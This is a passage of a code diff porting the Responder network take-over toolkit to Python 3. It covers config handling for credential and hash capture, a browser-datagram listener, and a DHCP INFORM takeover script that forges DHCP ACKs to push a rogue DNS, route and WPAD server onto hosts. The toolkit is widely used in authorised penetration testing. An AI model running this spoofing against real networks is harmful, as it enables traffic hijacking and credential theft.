+		self.CaptureMultipleCredentials       = self.toBool(config.get('Responder Core', 'CaptureMultipleCredentials'))
+		self.CaptureMultipleHashFromSameHost  = self.toBool(config.get('Responder Core', 'CaptureMultipleHashFromSameHost'))
+		self.AutoIgnoreList                   = []
 
 		# CLI options
-		self.LM_On_Off       = options.LM_On_Off
-		self.WPAD_On_Off     = options.WPAD_On_Off
-		self.Wredirect       = options.Wredirect
-		self.NBTNSDomain     = options.NBTNSDomain
-		self.Basic           = options.Basic
-		self.Finger_On_Off   = options.Finger
-		self.Interface       = options.Interface
-		self.OURIP           = options.OURIP
-		self.Force_WPAD_Auth = options.Force_WPAD_Auth
-		self.Upstream_Proxy  = options.Upstream_Proxy
-		self.AnalyzeMode     = options.Analyze
-		self.Verbose         = options.Verbose
-		self.CommandLine     = str(sys.argv)
+		self.ExternalIP         = options.ExternalIP
+		self.LM_On_Off          = options.LM_On_Off
+		self.WPAD_On_Off        = options.WPAD_On_Off
+		self.Wredirect          = options.Wredirect
+		self.NBTNSDomain        = options.NBTNSDomain
+		self.Basic              = options.Basic
+		self.Finger_On_Off      = options.Finger
+		self.Interface          = options.Interface
+		self.OURIP              = options.OURIP
+		self.Force_WPAD_Auth    = options.Force_WPAD_Auth
+		self.Upstream_Proxy     = options.Upstream_Proxy
+		self.AnalyzeMode        = options.Analyze
+		self.Verbose            = options.Verbose
+		self.ProxyAuth_On_Off   = options.ProxyAuth_On_Off
+		self.CommandLine        = str(sys.argv)
+
+		if self.ExternalIP:
+			self.ExternalIPAton = socket.inet_aton(self.ExternalIP)
 
 		if self.HtmlToInject is None:
 			self.HtmlToInject = ''
 
-		self.Bind_To = utils.FindLocalIP(self.Interface, self.OURIP)
+		self.Bind_To         = utils.FindLocalIP(self.Interface, self.OURIP)
+
+		if self.Interface == "ALL":
+                	self.Bind_To_ALL  = True
+		else:
+			self.Bind_To_ALL  = False
+
+		if self.Interface == "ALL":
+			self.IP_aton   = socket.inet_aton(self.OURIP)
+		else:
+			self.IP_aton   = socket.inet_aton(self.Bind_To)
 
-		self.IP_aton         = socket.inet_aton(self.Bind_To)
 		self.Os_version      = sys.platform
 
 		# Set up Challenge
 		self.NumChal = config.get('Responder Core', 'Challenge')
+		if self.NumChal.lower() == 'random':
+			self.NumChal = "random"
 
-		if len(self.NumChal) is not 16:
-			print utils.color("[!] The challenge must be exactly 16 chars long.\nExample: 1122334455667788", 1)
+		if len(self.NumChal) != 16 and self.NumChal != "random":
+			print(utils.color("[!] The challenge must be exactly 16 chars long.\nExample: 1122334455667788", 1))
 			sys.exit(-1)
 
-		self.Challenge = ""
-		for i in range(0, len(self.NumChal),2):
-			self.Challenge += self.NumChal[i:i+2].decode("hex")
+		self.Challenge = b''
+		if self.NumChal.lower() == 'random':
+			pass
+		else:
+			if self.PY2OR3 == 'PY2':
+				for i in range(0, len(self.NumChal),2):
+					self.Challenge += self.NumChal[i:i+2].decode("hex")
+			else:
+					self.Challenge = bytes.fromhex(self.NumChal)
+
 
 		# Set up logging
 		logging.basicConfig(filename=self.SessionLogFile, level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
 		logging.warning('Responder Started: %s' % self.CommandLine)
 
 		Formatter = logging.Formatter('%(asctime)s - %(message)s')
-                CLog_Handler = logging.FileHandler(self.ResponderConfigDump, 'a')
 		PLog_Handler = logging.FileHandler(self.PoisonersLogFile, 'w')
 		ALog_Handler = logging.FileHandler(self.AnalyzeLogFile, 'a')
-                CLog_Handler.setLevel(logging.INFO)
 		PLog_Handler.setLevel(logging.INFO)
 		ALog_Handler.setLevel(logging.INFO)
 		PLog_Handler.setFormatter(Formatter)
 		ALog_Handler.setFormatter(Formatter)
 
-		self.ResponderConfigLogger = logging.getLogger('Config Dump Log')
-		self.ResponderConfigLogger.addHandler(CLog_Handler)
-
 		self.PoisonersLogger = logging.getLogger('Poisoners Log')
 		self.PoisonersLogger.addHandler(PLog_Handler)
 
 		self.AnalyzeLogger = logging.getLogger('Analyze Log')
 		self.AnalyzeLogger.addHandler(ALog_Handler)
                 
-                NetworkCard = subprocess.check_output(["ifconfig", "-a"])
-                DNS = subprocess.check_output(["cat", "/etc/resolv.conf"])
-                RoutingInfo = subprocess.check_output(["netstat", "-rn"])
-                Message = "Current environment is:\nNetwork Config:\n%s\nDNS Settings:\n%s\nRouting info:\n%s\n\n"%(NetworkCard,DNS,RoutingInfo)
-                self.ResponderConfigLogger.warning(Message)
-                self.ResponderConfigLogger.warning(str(self))
+		try:
+			NetworkCard = subprocess.check_output(["ifconfig", "-a"])
+		except:
+			try:
+				NetworkCard = subprocess.check_output(["ip", "address", "show"])
+			except subprocess.CalledProcessError as ex:
+				NetworkCard = "Error fetching Network Interfaces:", ex
+				pass
+		try:
+			DNS = subprocess.check_output(["cat", "/etc/resolv.conf"])
+		except subprocess.CalledProcessError as ex:
+			DNS = "Error fetching DNS configuration:", ex
+			pass
+		try:
+			RoutingInfo = subprocess.check_output(["netstat", "-rn"])
+		except:
+			try:
+				RoutingInfo = subprocess.check_output(["ip", "route", "show"])
+			except subprocess.CalledProcessError as ex:
+				RoutingInfo = "Error fetching Routing information:", ex
+				pass
+
+		Message = "Current environment is:\nNetwork Config:\n%s\nDNS Settings:\n%s\nRouting info:\n%s\n\n"%(NetworkCard,DNS,RoutingInfo)
+		try:
+			utils.DumpConfig(self.ResponderConfigDump, Message)
+			utils.DumpConfig(self.ResponderConfigDump,str(self))
+		except AttributeError as ex:
+			print("Missing Module:", ex)
+			pass
 
 def init():
 	global Config

tools/BrowserListener.py

@@ -1,5 +1,5 @@
 #!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
+# This file is part of Responder, a network take-over set of tools
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
 # This program is free software: you can redistribute it and/or modify
@@ -16,103 +16,103 @@
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import sys
 import os
-import thread
+import _thread
 
 BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
 sys.path.insert(0, BASEDIR)
 
 from servers.Browser import WorkstationFingerPrint, RequestType, RAPThisDomain, RapFinger
-from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler
+from socketserver import UDPServer, ThreadingMixIn, BaseRequestHandler
 from threading import Lock
 from utils import *
 
 def ParseRoles(data):
-	if len(data) != 4:
-		return ''
+    if len(data) != 4:
+        return ''
 
-	AllRoles = {
-		'Workstation':           (ord(data[0]) >> 0) & 1,
-		'Server':                (ord(data[0]) >> 1) & 1,
-		'SQL':                   (ord(data[0]) >> 2) & 1,
-		'Domain Controller':     (ord(data[0]) >> 3) & 1,
-		'Backup Controller':     (ord(data[0]) >> 4) & 1,
-		'Time Source':           (ord(data[0]) >> 5) & 1,
-		'Apple':                 (ord(data[0]) >> 6) & 1,
-		'Novell':                (ord(data[0]) >> 7) & 1,
-		'Member':                (ord(data[1]) >> 0) & 1,
-		'Print':                 (ord(data[1]) >> 1) & 1,
-		'Dialin':                (ord(data[1]) >> 2) & 1,
-		'Xenix':                 (ord(data[1]) >> 3) & 1,
-		'NT Workstation':        (ord(data[1]) >> 4) & 1,
-		'WfW':                   (ord(data[1]) >> 5) & 1,
-		'Unused':                (ord(data[1]) >> 6) & 1,
-		'NT Server':             (ord(data[1]) >> 7) & 1,
-		'Potential Browser':     (ord(data[2]) >> 0) & 1,
-		'Backup Browser':        (ord(data[2]) >> 1) & 1,
-		'Master Browser':        (ord(data[2]) >> 2) & 1,
-		'Domain Master Browser': (ord(data[2]) >> 3) & 1,
-		'OSF':                   (ord(data[2]) >> 4) & 1,
-		'VMS':                   (ord(data[2]) >> 5) & 1,
-		'Windows 95+':           (ord(data[2]) >> 6) & 1,
-		'DFS':                   (ord(data[2]) >> 7) & 1,
-		'Local':                 (ord(data[3]) >> 6) & 1,
-		'Domain Enum':           (ord(data[3]) >> 7) & 1,
-	}
+    AllRoles = {
+            'Workstation':           (ord(data[0]) >> 0) & 1,
+            'Server':                (ord(data[0]) >> 1) & 1,
+            'SQL':                   (ord(data[0]) >> 2) & 1,
+            'Domain Controller':     (ord(data[0]) >> 3) & 1,
+            'Backup Controller':     (ord(data[0]) >> 4) & 1,
+            'Time Source':           (ord(data[0]) >> 5) & 1,
+            'Apple':                 (ord(data[0]) >> 6) & 1,
+            'Novell':                (ord(data[0]) >> 7) & 1,
+            'Member':                (ord(data[1]) >> 0) & 1,
+            'Print':                 (ord(data[1]) >> 1) & 1,
+            'Dialin':                (ord(data[1]) >> 2) & 1,
+            'Xenix':                 (ord(data[1]) >> 3) & 1,
+            'NT Workstation':        (ord(data[1]) >> 4) & 1,
+            'WfW':                   (ord(data[1]) >> 5) & 1,
+            'Unused':                (ord(data[1]) >> 6) & 1,
+            'NT Server':             (ord(data[1]) >> 7) & 1,
+            'Potential Browser':     (ord(data[2]) >> 0) & 1,
+            'Backup Browser':        (ord(data[2]) >> 1) & 1,
+            'Master Browser':        (ord(data[2]) >> 2) & 1,
+            'Domain Master Browser': (ord(data[2]) >> 3) & 1,
+            'OSF':                   (ord(data[2]) >> 4) & 1,
+            'VMS':                   (ord(data[2]) >> 5) & 1,
+            'Windows 95+':           (ord(data[2]) >> 6) & 1,
+            'DFS':                   (ord(data[2]) >> 7) & 1,
+            'Local':                 (ord(data[3]) >> 6) & 1,
+            'Domain Enum':           (ord(data[3]) >> 7) & 1,
+    }
 
-	return ', '.join(k for k,v in AllRoles.items() if v == 1)
+    return ', '.join(k for k,v in list(AllRoles.items()) if v == 1)
 
 
 class BrowserListener(BaseRequestHandler):
-	def handle(self):
-		data, socket = self.request
+    def handle(self):
+        data, socket = self.request
 
-		lock = Lock()
-		lock.acquire()
+        lock = Lock()
+        lock.acquire()
 
-		DataOffset    = struct.unpack('<H',data[139:141])[0]
-		BrowserPacket = data[82+DataOffset:]
-		ReqType       = RequestType(BrowserPacket[0])
+        DataOffset    = struct.unpack('<H',data[139:141])[0]
+        BrowserPacket = data[82+DataOffset:]
+        ReqType       = RequestType(BrowserPacket[0])
 
-		Domain = Decode_Name(data[49:81])
-		Name   = Decode_Name(data[15:47])
-		Role1  = NBT_NS_Role(data[45:48])
-		Role2  = NBT_NS_Role(data[79:82])
-		Fprint = WorkstationFingerPrint(data[190:192])
-		Roles  = ParseRoles(data[192:196])
+        Domain = Decode_Name(data[49:81])
+        Name   = Decode_Name(data[15:47])
+        Role1  = NBT_NS_Role(data[45:48])
+        Role2  = NBT_NS_Role(data[79:82])
+        Fprint = WorkstationFingerPrint(data[190:192])
+        Roles  = ParseRoles(data[192:196])
 
-		print text("[BROWSER] Request Type : %s" % ReqType)
-		print text("[BROWSER] Address      : %s" % self.client_address[0])
-		print text("[BROWSER] Domain       : %s" % Domain)
-		print text("[BROWSER] Name         : %s" % Name)
-		print text("[BROWSER] Main Role    : %s" % Role1)
-		print text("[BROWSER] 2nd Role     : %s" % Role2)
-		print text("[BROWSER] Fingerprint  : %s" % Fprint)
-		print text("[BROWSER] Role List    : %s" % Roles)
+        print(text("[BROWSER] Request Type : %s" % ReqType))
+        print(text("[BROWSER] Address      : %s" % self.client_address[0]))
+        print(text("[BROWSER] Domain       : %s" % Domain))
+        print(text("[BROWSER] Name         : %s" % Name))
+        print(text("[BROWSER] Main Role    : %s" % Role1))
+        print(text("[BROWSER] 2nd Role     : %s" % Role2))
+        print(text("[BROWSER] Fingerprint  : %s" % Fprint))
+        print(text("[BROWSER] Role List    : %s" % Roles))
 
-		RAPThisDomain(self.client_address[0], Domain)
+        RAPThisDomain(self.client_address[0], Domain)
 
-		lock.release()
+        lock.release()
 
 
 class ThreadingUDPServer(ThreadingMixIn, UDPServer):
-	def server_bind(self):
-		self.allow_reuse_address = 1
-		UDPServer.server_bind(self)
+    def server_bind(self):
+        self.allow_reuse_address = 1
+        UDPServer.server_bind(self)
 
 def serve_thread_udp_broadcast(host, port, handler):
-	try:
-		server = ThreadingUDPServer(('', port), handler)
-		server.serve_forever()
-	except:
-		print "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
+    try:
+        server = ThreadingUDPServer(('', port), handler)
+        server.serve_forever()
+    except:
+        print("Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")
 
 if __name__ == "__main__":
-	try:
-		print "Listening for BROWSER datagrams..."
-		thread.start_new(serve_thread_udp_broadcast,('', 138,  BrowserListener))
+    try:
+        print("Listening for BROWSER datagrams...")
+        _thread.start_new(serve_thread_udp_broadcast,('', 138,  BrowserListener))
 
-		while True:
-			time.sleep(1)
+        while True:
+            time.sleep(1)
 
-	except KeyboardInterrupt:
-		sys.exit("\r Exiting...")
+    except KeyboardInterrupt:
+        sys.exit("\r Exiting...")

tools/DHCP.py

@@ -1,5 +1,5 @@
 #!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
+# This file is part of Responder, a network take-over set of tools
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
 # This program is free software: you can redistribute it and/or modify
@@ -15,15 +15,16 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import sys
+if (sys.version_info < (3, 0)):
+   sys.exit('This script is meant to be run with Python3')
 import struct
 import optparse
-import ConfigParser
+import configparser
 import os
-
+import codecs
 BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
 sys.path.insert(0, BASEDIR)
 from odict import OrderedDict
-from packets import Packet
 from utils import *
 
 parser = optparse.OptionParser(usage='python %prog -I eth0 -d pwned.com -p 10.20.30.40 -s 10.20.30.1 -r 10.20.40.1', prog=sys.argv[0],)
@@ -39,42 +40,81 @@ parser.add_option('-R',                 action="store_true", help="Respond to DH
 options, args = parser.parse_args()
 
 def color(txt, code = 1, modifier = 0):
-	return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
+    return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
 
 if options.Interface is None:
-	print color("[!]", 1, 1), "-I mandatory option is missing, please provide an interface."
-	exit(-1)
+    print(color("[!]", 1, 1), "-I mandatory option is missing, please provide an interface.")
+    exit(-1)
 elif options.RouterIP is None:
-	print color("[!]", 1, 1), "-r mandatory option is missing, please provide the router's IP."
-	exit(-1)
+    print(color("[!]", 1, 1), "-r mandatory option is missing, please provide the router's IP.")
+    exit(-1)
 elif options.DNSIP is None:
-	print color("[!]", 1, 1), "-p mandatory option is missing, please provide the primary DNS server ip address or yours."
-	exit(-1)
+    print(color("[!]", 1, 1), "-p mandatory option is missing, please provide the primary DNS server ip address or yours.")
+    exit(-1)
 elif options.DNSIP2 is None:
-	print color("[!]", 1, 1), "-s mandatory option is missing, please provide the secondary DNS server ip address or yours."
-	exit(-1)
+    print(color("[!]", 1, 1), "-s mandatory option is missing, please provide the secondary DNS server ip address or yours.")
+    exit(-1)
 
+#Python version
+if (sys.version_info > (3, 0)):
+    PY2OR3     = "PY3"
+else:
+    PY2OR3  = "PY2"
 
-print '#############################################################################'
-print '##                       DHCP INFORM TAKEOVER 0.2                          ##'
-print '##                                                                         ##'
-print '##        By default, this script will only inject a new DNS/WPAD          ##'
-print '##                server to a Windows <= XP/2003 machine.                  ##'
-print '##                                                                         ##'
-print '##     To inject a DNS server/domain/route on a Windows >= Vista and       ##'
-print '##               any linux box, use -R (can be noisy)                      ##'
-print '##                                                                         ##'
-print '##   Use `RespondTo` setting in Responder.conf for in-scope targets only.  ##'
-print '#############################################################################'
-print ''
-print color('[*]', 2, 1), 'Listening for events...'
+def StructWithLenPython2or3(endian,data):
+    #Python2...
+    if PY2OR3 == "PY2":
+        return struct.pack(endian, data)
+    #Python3...
+    else:
+        return struct.pack(endian, data).decode('latin-1')
 
-config = ConfigParser.ConfigParser()
+def NetworkSendBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return bytes(str(data), 'latin-1')
+
+def NetworkRecvBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return str(data.decode('latin-1'))
+
+class Packet():
+	fields = OrderedDict([
+		("data", ""),
+	])
+	def __init__(self, **kw):
+		self.fields = OrderedDict(self.__class__.fields)
+		for k,v in kw.items():
+			if callable(v):
+				self.fields[k] = v(self.fields[k])
+			else:
+				self.fields[k] = v
+	def __str__(self):
+		return "".join(map(str, self.fields.values()))
+
+print('#############################################################################')
+print('##                       DHCP INFORM TAKEOVER 0.3                          ##')
+print('##                                                                         ##')
+print('##        By default, this script will only inject a new DNS/WPAD          ##')
+print('##                server to a Windows <= XP/2003 machine.                  ##')
+print('##                                                                         ##')
+print('##     To inject a DNS server/domain/route on a Windows >= Vista and       ##')
+print('##               any linux box, use -R (can be noisy)                      ##')
+print('##                                                                         ##')
+print('##   Use `RespondTo` setting in Responder.conf for in-scope targets only.  ##')
+print('#############################################################################')
+print('')
+print(color('[*]', 2, 1), 'Listening for events...')
+
+config = configparser.ConfigParser()
 config.read(os.path.join(BASEDIR,'Responder.conf'))
-RespondTo           = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')])
-DontRespondTo       = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')])
+RespondTo           = [_f for _f in [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')] if _f]
+DontRespondTo       = [_f for _f in [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')] if _f]
 Interface           = options.Interface
-Responder_IP        = FindLocalIP(Interface)
+Responder_IP        = FindLocalIP(Interface, None)
 ROUTERIP            = options.RouterIP
 NETMASK             = options.Netmask
 DHCPSERVER          = Responder_IP
@@ -86,233 +126,235 @@ Spoof               = options.Spoof
 Respond_To_Requests = options.Respond_To_Requests
 
 if Spoof:
-	DHCPSERVER = ROUTERIP
+    DHCPSERVER = ROUTERIP
 
 ##### IP Header #####
 class IPHead(Packet):
-	fields = OrderedDict([
-		("Version",           "\x45"),
-		("DiffServices",      "\x00"),
-		("TotalLen",          "\x00\x00"),
-		("Ident",             "\x00\x00"),
-		("Flags",             "\x00\x00"),
-		("TTL",               "\x40"),
-		("Protocol",          "\x11"),
-		("Checksum",          "\x00\x00"),
-		("SrcIP",             ""),
-		("DstIP",             ""),
-	])
+    fields = OrderedDict([
+            ("Version",           "\x45"),
+            ("DiffServices",      "\x00"),
+            ("TotalLen",          "\x00\x00"),
+            ("Ident",             "\x00\x00"),
+            ("Flags",             "\x00\x00"),
+            ("TTL",               "\x40"),
+            ("Protocol",          "\x11"),
+            ("Checksum",          "\x00\x00"),
+            ("SrcIP",             ""),
+            ("DstIP",             ""),
+    ])
 
 class UDP(Packet):
-	fields = OrderedDict([
-		("SrcPort",           "\x00\x43"),
-		("DstPort",           "\x00\x44"),
-		("Len",               "\x00\x00"),
-		("Checksum",          "\x00\x00"),
-		("Data",              "\x00\x00"),
-	])
+    fields = OrderedDict([
+            ("SrcPort",           "\x00\x43"),
+            ("DstPort",           "\x00\x44"),
+            ("Len",               "\x00\x00"),
+            ("Checksum",          "\x00\x00"),
+            ("Data",              "\x00\x00"),
+    ])
 
-	def calculate(self):
-		self.fields["Len"] = struct.pack(">h",len(str(self.fields["Data"]))+8)
+    def calculate(self):
+        self.fields["Len"] = StructWithLenPython2or3(">h",len(str(self.fields["Data"]))+8)
 
 class DHCPACK(Packet):
-	fields = OrderedDict([
-		("MessType",          "\x02"),
-		("HdwType",           "\x01"),
-		("HdwLen",            "\x06"),
-		("Hops",              "\x00"),
-		("Tid",               "\x11\x22\x33\x44"),
-		("ElapsedSec",        "\x00\x00"),
-		("BootpFlags",        "\x00\x00"),
-		("ActualClientIP",    "\x00\x00\x00\x00"),
-		("GiveClientIP",      "\x00\x00\x00\x00"),
-		("NextServerIP",      "\x00\x00\x00\x00"),
-		("RelayAgentIP",      "\x00\x00\x00\x00"),
-		("ClientMac",         "\xff\xff\xff\xff\xff\xff"),
-		("ClientMacPadding",  "\x00" *10),
-		("ServerHostname",    "\x00" * 64),
-		("BootFileName",      "\x00" * 128),
-		("MagicCookie",       "\x63\x82\x53\x63"),
-		("DHCPCode",          "\x35"),              #DHCP Message
-		("DHCPCodeLen",       "\x01"),
-		("DHCPOpCode",        "\x05"),              #Msgtype(ACK)
-		("Op54",              "\x36"),
-		("Op54Len",           "\x04"),
-		("Op54Str",           ""),                  #DHCP Server
-		("Op51",              "\x33"),
-		("Op51Len",           "\x04"),
-		("Op51Str",           "\x00\x01\x51\x80"),  #Lease time, 1 day
-		("Op1",               "\x01"),
-		("Op1Len",            "\x04"),
-		("Op1Str",            ""),                  #Netmask
-		("Op15",              "\x0f"),
-		("Op15Len",           "\x0e"),
-		("Op15Str",           ""),                  #DNS Name
-		("Op3",               "\x03"),
-		("Op3Len",            "\x04"),
-		("Op3Str",            ""),                  #Router
-		("Op6",               "\x06"),
-		("Op6Len",            "\x08"),
-		("Op6Str",            ""),                  #DNS Servers
-		("Op252",             "\xfc"),
-		("Op252Len",          "\x04"),
-		("Op252Str",          ""),                  #Wpad Server
-		("Op255",             "\xff"),
-		("Padding",           "\x00"),
-	])
+    fields = OrderedDict([
+            ("MessType",          "\x02"),
+            ("HdwType",           "\x01"),
+            ("HdwLen",            "\x06"),
+            ("Hops",              "\x00"),
+            ("Tid",               "\x11\x22\x33\x44"),
+            ("ElapsedSec",        "\x00\x00"),
+            ("BootpFlags",        "\x00\x00"),
+            ("ActualClientIP",    "\x00\x00\x00\x00"),
+            ("GiveClientIP",      "\x00\x00\x00\x00"),
+            ("NextServerIP",      "\x00\x00\x00\x00"),
+            ("RelayAgentIP",      "\x00\x00\x00\x00"),
+            ("ClientMac",         "\xff\xff\xff\xff\xff\xff"),
+            ("ClientMacPadding",  "\x00" *10),
+            ("ServerHostname",    "\x00" * 64),
+            ("BootFileName",      "\x00" * 128),
+            ("MagicCookie",       "\x63\x82\x53\x63"),
+            ("DHCPCode",          "\x35"),              #DHCP Message
+            ("DHCPCodeLen",       "\x01"),
+            ("DHCPOpCode",        "\x05"),              #Msgtype(ACK)
+            ("Op54",              "\x36"),
+            ("Op54Len",           "\x04"),
+            ("Op54Str",           ""),                  #DHCP Server
+            ("Op51",              "\x33"),
+            ("Op51Len",           "\x04"),
+            ("Op51Str",           "\x00\x01\x51\x80"),  #Lease time, 1 day
+            ("Op1",               "\x01"),
+            ("Op1Len",            "\x04"),
+            ("Op1Str",            ""),                  #Netmask
+            ("Op15",              "\x0f"),
+            ("Op15Len",           "\x0e"),
+            ("Op15Str",           ""),                  #DNS Name
+            ("Op3",               "\x03"),
+            ("Op3Len",            "\x04"),
+            ("Op3Str",            ""),                  #Router
+            ("Op6",               "\x06"),
+            ("Op6Len",            "\x08"),
+            ("Op6Str",            ""),                  #DNS Servers
+            ("Op252",             "\xfc"),
+            ("Op252Len",          "\x04"),
+            ("Op252Str",          ""),                  #Wpad Server
+            ("Op255",             "\xff"),
+            ("Padding",           "\x00"),
+    ])
 
-	def calculate(self):
-		self.fields["Op54Str"]  = socket.inet_aton(DHCPSERVER)
-		self.fields["Op1Str"]   = socket.inet_aton(NETMASK)
-		self.fields["Op3Str"]   = socket.inet_aton(ROUTERIP)
-		self.fields["Op6Str"]   = socket.inet_aton(DNSIP)+socket.inet_aton(DNSIP2)
-		self.fields["Op15Str"]  = DNSNAME
-		self.fields["Op252Str"] = WPADSRV
-		self.fields["Op15Len"]  = struct.pack(">b",len(str(self.fields["Op15Str"])))
-		self.fields["Op252Len"] = struct.pack(">b",len(str(self.fields["Op252Str"])))
+    def calculate(self):
+        self.fields["Op54Str"]  = socket.inet_aton(DHCPSERVER).decode('latin-1')
+        self.fields["Op1Str"]   = socket.inet_aton(NETMASK).decode('latin-1')
+        self.fields["Op3Str"]   = socket.inet_aton(ROUTERIP).decode('latin-1')
+        self.fields["Op6Str"]   = socket.inet_aton(DNSIP).decode('latin-1')+socket.inet_aton(DNSIP2).decode('latin-1')
+        self.fields["Op15Str"]  = DNSNAME
+        self.fields["Op252Str"] = WPADSRV
+        self.fields["Op15Len"]  = StructWithLenPython2or3(">b",len(str(self.fields["Op15Str"])))
+        self.fields["Op252Len"] = StructWithLenPython2or3(">b",len(str(self.fields["Op252Str"])))
 
 class DHCPInformACK(Packet):
-	fields = OrderedDict([
-		("MessType",          "\x02"),
-		("HdwType",           "\x01"),
-		("HdwLen",            "\x06"),
-		("Hops",              "\x00"),
-		("Tid",               "\x11\x22\x33\x44"),
-		("ElapsedSec",        "\x00\x00"),
-		("BootpFlags",        "\x00\x00"),
-		("ActualClientIP",    "\x00\x00\x00\x00"),
-		("GiveClientIP",      "\x00\x00\x00\x00"),
-		("NextServerIP",      "\x00\x00\x00\x00"),
-		("RelayAgentIP",      "\x00\x00\x00\x00"),
-		("ClientMac",         "\xff\xff\xff\xff\xff\xff"),
-		("ClientMacPadding",  "\x00" *10),
-		("ServerHostname",    "\x00" * 64),
-		("BootFileName",      "\x00" * 128),
-		("MagicCookie",       "\x63\x82\x53\x63"),
-		("Op53",              "\x35\x01\x05"),      #Msgtype(ACK)
-		("Op54",              "\x36"),
-		("Op54Len",           "\x04"),
-		("Op54Str",           ""),                  #DHCP Server
-		("Op1",               "\x01"),
-		("Op1Len",            "\x04"),
-		("Op1Str",            ""),                  #Netmask
-		("Op15",              "\x0f"),
-		("Op15Len",           "\x0e"),
-		("Op15Str",           ""),                  #DNS Name
-		("Op3",               "\x03"),
-		("Op3Len",            "\x04"),
-		("Op3Str",            ""),                  #Router
-		("Op6",               "\x06"),
-		("Op6Len",            "\x08"),
-		("Op6Str",            ""),                  #DNS Servers
-		("Op252",             "\xfc"),
-		("Op252Len",          "\x04"),
-		("Op252Str",          ""),                  #Wpad Server.
-		("Op255",             "\xff"),
-	])
+    fields = OrderedDict([
+            ("MessType",          "\x02"),
+            ("HdwType",           "\x01"),
+            ("HdwLen",            "\x06"),
+            ("Hops",              "\x00"),
+            ("Tid",               "\x11\x22\x33\x44"),
+            ("ElapsedSec",        "\x00\x00"),
+            ("BootpFlags",        "\x00\x00"),
+            ("ActualClientIP",    "\x00\x00\x00\x00"),
+            ("GiveClientIP",      "\x00\x00\x00\x00"),
+            ("NextServerIP",      "\x00\x00\x00\x00"),
+            ("RelayAgentIP",      "\x00\x00\x00\x00"),
+            ("ClientMac",         "\xff\xff\xff\xff\xff\xff"),
+            ("ClientMacPadding",  "\x00" *10),
+            ("ServerHostname",    "\x00" * 64),
+            ("BootFileName",      "\x00" * 128),
+            ("MagicCookie",       "\x63\x82\x53\x63"),
+            ("Op53",              "\x35\x01\x05"),      #Msgtype(ACK)
+            ("Op54",              "\x36"),
+            ("Op54Len",           "\x04"),
+            ("Op54Str",           ""),                  #DHCP Server
+            ("Op1",               "\x01"),
+            ("Op1Len",            "\x04"),
+            ("Op1Str",            ""),                  #Netmask
+            ("Op15",              "\x0f"),
+            ("Op15Len",           "\x0e"),
+            ("Op15Str",           ""),                  #DNS Name
+            ("Op3",               "\x03"),
+            ("Op3Len",            "\x04"),
+            ("Op3Str",            ""),                  #Router
+            ("Op6",               "\x06"),
+            ("Op6Len",            "\x08"),
+            ("Op6Str",            ""),                  #DNS Servers
+            ("Op252",             "\xfc"),
+            ("Op252Len",          "\x04"),
+            ("Op252Str",          ""),                  #Wpad Server.
+            ("Op255",             "\xff"),
+    ])
 
-	def calculate(self):
-		self.fields["Op54Str"]  = socket.inet_aton(DHCPSERVER)
-		self.fields["Op1Str"]   = socket.inet_aton(NETMASK)
-		self.fields["Op3Str"]   = socket.inet_aton(ROUTERIP)
-		self.fields["Op6Str"]   = socket.inet_aton(DNSIP)+socket.inet_aton(DNSIP2)
-		self.fields["Op15Str"]  = DNSNAME
-		self.fields["Op252Str"] = WPADSRV
-		self.fields["Op15Len"]  = struct.pack(">b",len(str(self.fields["Op15Str"])))
-		self.fields["Op252Len"] = struct.pack(">b",len(str(self.fields["Op252Str"])))
+    def calculate(self):
+        self.fields["Op54Str"]  = socket.inet_aton(DHCPSERVER).decode('latin-1')
+        self.fields["Op1Str"]   = socket.inet_aton(NETMASK).decode('latin-1')
+        self.fields["Op3Str"]   = socket.inet_aton(ROUTERIP).decode('latin-1')
+        self.fields["Op6Str"]   = socket.inet_aton(DNSIP).decode('latin-1')+socket.inet_aton(DNSIP2).decode('latin-1')
+        self.fields["Op15Str"]  = DNSNAME
+        self.fields["Op252Str"] = WPADSRV
+        self.fields["Op15Len"]  = StructWithLenPython2or3(">b",len(str(self.fields["Op15Str"])))
+        self.fields["Op252Len"] = StructWithLenPython2or3(">b",len(str(self.fields["Op252Str"])))
 
 def SpoofIP(Spoof):
-	return ROUTERIP if Spoof else Responder_IP
+    return ROUTERIP if Spoof else Responder_IP
 
 def RespondToThisIP(ClientIp):
-	if ClientIp.startswith('127.0.0.'):
-		return False
-	elif RespondTo and ClientIp not in RespondTo:
-		return False
-	elif ClientIp in RespondTo or RespondTo == []:
-		if ClientIp not in DontRespondTo:
-			return True
-	return False
+    if ClientIp.startswith('127.0.0.'):
+        return False
+    elif RespondTo and ClientIp not in RespondTo:
+        return False
+    elif ClientIp in RespondTo or RespondTo == []:
+        if ClientIp not in DontRespondTo:
+            return True
+    return False
 
 def ParseSrcDSTAddr(data):
-	SrcIP = socket.inet_ntoa(data[0][26:30])
-	DstIP = socket.inet_ntoa(data[0][30:34])
-	SrcPort = struct.unpack('>H',data[0][34:36])[0]
-	DstPort = struct.unpack('>H',data[0][36:38])[0]
-	return SrcIP, SrcPort, DstIP, DstPort
+    SrcIP = socket.inet_ntoa(data[0][26:30])
+    DstIP = socket.inet_ntoa(data[0][30:34])
+    SrcPort = struct.unpack('>H',data[0][34:36])[0]
+    DstPort = struct.unpack('>H',data[0][36:38])[0]
